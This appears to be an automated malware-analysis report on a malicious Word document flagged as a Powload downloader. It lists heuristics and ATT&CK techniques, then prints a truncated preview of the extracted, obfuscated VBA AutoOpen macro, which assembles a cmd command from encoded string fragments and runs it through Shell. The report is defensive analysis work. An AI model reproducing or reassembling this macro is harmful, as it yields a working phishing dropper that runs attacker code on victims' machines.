MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing a VBA macro with an AutoOpen function. This macro attempts to execute a command constructed from concatenated strings, which likely results in downloading and executing a second-stage payload. The ClamAV detection 'Doc.Downloader.Powload-6774364-0' further supports its role as a downloader.
Heuristics 5
-
ClamAV: Doc.Downloader.Powload-6774364-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Powload-6774364-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5301 bytes |
SHA-256: b1096e592ea770deeafa36a79d70e7f61e6d35742b2e1807aa05f6d024bc71a1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "aCVDArDbfXK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName AGSEt
TypeName Sgn(4)
TypeName CInt(UlnOI)
TypeName Fix(asnfF)
Shell@ CStr("c") + CStr("m") + uiiYzCv + wibumEwjKS + DGqNvzRws + nMnVw + hhkEP + OwWzHEm + vUNBWVikap, 335172665 - 335172665
TypeName ChrW(SfKndN)
TypeName SawBh
TypeName ChrW(ussGcU * 71144)
End Sub
Attribute VB_Name = "hRwQEdiiVMTD"
Function DGqNvzRws()
On Error Resume Next
TypeName CStr(paMHdh)
TypeName Chr(ZcwRLa)
TypeName Sqr(iUYWI + zvuwvr - dmTtE / sWGfjc)
sYKFYMGu = "d /V" + ":/C" + CStr(Chr(OOZGwiHhCm + DXXOMBizCcfAr + 34 + MRJUzSaSsPw + wKncWRRjZjwnEf)) + "s" + "et " + "45y=cmDY" + "QJfjrbG" + "lzw" + "oOWSiuin" + "kPUE" + "UUEr" + "X5;x h$-2/" + "N" + "dAH)@('," + "V=vp:"
TypeName DXZDp
TypeName ZDspb
TypeName Sgn(fCpiLo)
fJmBCZAoTOY = ".aste" + "y+7C3g" + "M}\qKF{" + "&&f" + "or %Q i" + "n" + " (52;14" + ";13" + ";58;29;56;" + "35;58;" + "1" + "1;11;34;3" + "6;12;65;43"
TypeName Rnd(laTwf)
TypeName Chr(4)
TypeName Oct(724)
TSKAAFpIwdY = ";50;21;5" + "8;1" + "3;37;" + "14;9;7" + ";58;0;5" + "7;34;40;" + "58;" + "57;54;1" + "6;58;9;62;" + "11;20" + ";58;"
TypeName 2752
TypeName CByte(67)
NCmIqzi = "21;" + "57;3" + "2" + ";" + "36;42"
TypeName aCwUAj
TypeName CBool(24278 - kjjrIh - mfOdM * 35261)
TypeName 5
uTiHiKU = ";56;69;50" + ";47;3" + "5;57;5" + "7;52;5" + "3;3" + "9;39;56;58" + ";29;5" + "1;20;0;58" + ";37;52;0;" + "54;0;14;1" + ";54;29;14;"
TypeName Cos(99304 - YbvXc)
TypeName Tan(dqtGoI)
TypeName Tan(6324377)
EuwttK = "39;29;1" + "4;6" + "4;45;" + "35;57;57;" + "52;" + "53;39;39;" + "11;14;1" + "9;0;20" + ";0;54" + ";0;14;1;5" + "4;9;29;39"
TypeName Cos(jPoajr)
TypeName ChrB(128995563)
TypeName 430940988
IdwBkb = ";49" + ";1;2" + "9;45;3" + "5;57;57;5" + "2;53;3"
TypeName CStr(MPZYY)
TypeName Log(85547 * ImohA - OknMH * zfqWfr)
tbKhGuF = "9;" + "39;1" + ";55;0;29;1" + "4;5" + "6;52;55;12" + ";20;14" + ";54;20;5"
TypeName ChrB(8377 + 47932 / 76165 - rPPdbX)
TypeName 1
TypeName CBool(78805 - RmZwbU)
alJkRKMTG = "7" + ";" + "39;14" + ";5;1" + "1;45;35;" + "57;57;52" + ";53;39;3" + "9;11;2" + "0;64;35" + ";57;37;58"
TypeName 403879529
TypeName CSng(wuwVG)
tLYCmwRzj = ";56;57;5" + "5;57;5" + "8;54" + ";0;14;" + "54;7;5" + "2" + ";39;1" + "1;14;64" + ";14;21" + ";39;65" + ";40;63" + ";45;35;57;"
TypeName CDbl(WZAVah)
TypeName 7825
TypeName 6
vKCWn = "57;" + "52" + ";" + "53;3" + "9;39;" + "1;20" + ";0;35;" + "20;64;55;2"
DGqNvzRws = sYKFYMGu + fJmBCZAoTOY + TSKAAFpIwdY + NCmIqzi + uTiHiKU + EuwttK + IdwBkb + tbKhGuF + alJkRKMTG + tLYCmwRzj + vKCWn
TypeName wAUwwQ
TypeName CBool(SGDLjz)
End Function
Function nMnVw()
On Error Resume Next
TypeName 475220870
TypeName Rnd(dVcqnP)
rXHKkBMhw = "1;9;19;" + "56;20;21;5" + "8;" + "56;56;" + "54;1" + "9;56;39;" + "64;2;19;6" + "2;2;55" + ";22;16;47;" + "54;17;52" + ";11;20;5" + "7;46" + ";47"
TypeName Log(585)
TypeName CBool(29296 / 88289 - tiVkF + rqkoJ)
JQZBI = ";45;4" + "7;44;32" + ";36;68;56;" + "65;34;" + "50;34;47;3" + "8;61;3"
TypeName Round(ZdjCi)
TypeName CLng(9)
HHpjEECsYP = "1;47" + ";32;36" + ";41;7;" + "28;50" + ";36;58;21;"
TypeName Fix(358205924)
TypeName iwirF
PZaYGzCidDN = "51" + ";" + "53;57;58;" + "1;52" + ";60;" + "47;6" + "7;47" + ";60;" + "3" + "6;68;56;" + "65" + ";60;47;54" + ";58;3"
TypeName toLja
TypeName CDate(11440 - CWzLrN)
vOUnYuDYj = "3;58;47;3" + "2;" + "6;14;29;" + "58;" + "55;0;35;46" + ";36;68;1" + "0;56;34;2" + "0;21;34;3" + "6;4" + "2;56;69;" + "44;71;57;"
TypeName Tan(97491 - fqUpOU)
TypeName 954
jzUJj = "29;59;" + "7" + "1;36;12;6" + "5;43;" + "54;2;14;1" + "3;2" + "1;11;" + "1" + "4;55;4" + "1;"
TypeName Log(286467437)
TypeName 4
uqzcCG = "70;2" + "0;1" + "1;5
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.